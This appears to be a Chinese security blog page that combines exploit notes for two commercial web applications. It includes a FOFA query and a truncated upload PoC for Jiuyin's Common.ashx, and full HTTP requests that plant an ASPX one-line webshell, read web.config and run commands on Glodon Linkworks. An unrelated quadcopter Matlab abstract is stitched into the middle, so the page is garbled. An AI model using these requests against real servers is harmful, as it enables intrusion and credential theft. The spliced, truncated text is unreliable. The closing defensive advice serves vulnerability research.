九垠赢商业管理系统Common.ashx存在文件上传漏洞

九垠系统文件上传漏洞及相关信息

简介

成都和力九垠科技有限公司成立于1999年,是一家专业从事零售业全流程解决方案的高科技公司,总部位于四川成都。多年来,九垠软件不忘初衷,一直致力于中国零售企业的成长与发展,为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展,九垠科技已成为中国零售企业管理信息化的领导品牌。

九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

fofa

"九垠赢"

poc

POST /System/Common.ashx?type=savefile&path
【四轴飞行器】非线性三自由度四轴飞行器模拟器研究(Matlab代码实现)内容概要:本文围绕非线性三自由度四轴飞行器模拟器的研究展开,重点介绍了基于Matlab的建模与仿真方法。通过对四轴飞行器的动力学特性进行分析,构建了非线性状态空间模型,并实现了姿态与位置的动态模拟。研究涵盖了飞行器运动方程的建立、控制系统设计及数值仿真验证等环节,突出非线性系统的精确建模与仿真优势,有助于深入理解飞行器在复杂工况下的行为特征。此外,文中还提到了多种配套技术如PID控制、状态估计与路径规划等,展示了Matlab在航空航天仿真中的综合应用能力。; 适合人群:具备一定自动控制理论基础和Matlab编程能力的高校学生、科研人员及从事无人机系统开发的工程技术人员,尤其适合研究生及以上层次的研究者。; 使用场景及目标:①用于四轴飞行器控制系统的设计与验证,支持算法快速原型开发;②作为教学工具帮助理解非线性动力学系统建模与仿真过程;③支撑科研项目中对飞行器姿态控制、轨迹跟踪等问题的深入研究; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注动力学建模与控制模块的实现细节,同时可延伸学习文档中提及的PID控制、状态估计等相关技术内容,以全面提升系统仿真与分析能力。
广联达 Linkworks 是一款广泛应用于建筑行业的协同管理平台。在某些版本中,由于对 `mobileAction.ashx` 和 `do.asmx` 接口的安全控制不足,导致存在任意文件写入和读取的漏洞。攻击者可以利用此漏洞上传恶意文件或读取服务器上的敏感文件,从而获取系统控制权限或敏感信息。 以下是该漏洞的复现步骤及技术细节: ### 3.1 漏洞原理 `mobileAction.ashx` 和 `do.asmx` 是广联达 Linkworks 提供的 Web 服务接口,原本用于处理移动端请求。由于未对用户输入进行严格过滤和权限控制,攻击者可以通过构造特定的请求,向服务器写入任意内容的文件(如 `.aspx`、`.txt` 等),并可通过其他接口读取这些文件内容,从而实现远程代码执行或信息泄露。 该漏洞的核心在于未对上传路径和文件内容进行限制,允许通过特定参数控制文件名和写入内容。 ### 3.2 漏洞复现环境搭建 - **目标系统**:广联达 Linkworks 某些未修复版本(具体版本需根据实际测试) - **工具准备**: - Burp Suite 或 Postman - 文本编辑器(用于构造 payload) ### 3.3 任意文件写入(WebShell) 构造如下请求,通过 `mobileAction.ashx` 接口写入一个简单的 WebShell 文件: ```http POST /mobileAction.ashx HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=writefile&filename=upload/test.aspx&content=<%Eval(Request("cmd"))%> ``` - `action=writefile` 表示执行写文件操作 - `filename` 指定写入路径,如 `upload/test.aspx` - `content` 为写入内容,此处为 ASPX 一句话木马 若服务器未做严格校验,将在 `upload/` 目录下生成 `test.aspx` 文件,内容为 WebShell 代码。 ### 3.4 任意文件读取 通过 `do.asmx` 接口构造请求读取任意文件内容: ```http POST /do.asmx HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=readfile&filename=../web.config ``` - `action=readfile` 表示执行读文件操作 - `filename` 指定读取路径,如 `../web.config`,可读取配置文件、数据库连接字符串等敏感信息 ### 3.5 漏洞利用验证 访问写入的 WebShell 文件: ```http GET /upload/test.aspx?cmd=whoami HTTP/1.1 Host: target.com ``` 若服务器返回当前执行用户的用户名,则说明成功执行了命令,漏洞利用成功。 ### 3.6 防御建议 - **升级系统**:官方已发布修复补丁,请及时升级至安全版本。 - **限制上传路径**:禁止用户上传可执行脚本文件(如 `.aspx`、`.php` 等)。 - **输入过滤**:对文件名、路径、内容等参数进行严格校验,防止任意写入。 - **权限控制**:限制 Web 服务接口的访问权限,仅允许授权用户调用。 - **日志审计**:加强日志记录与审计,及时发现异常请求。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值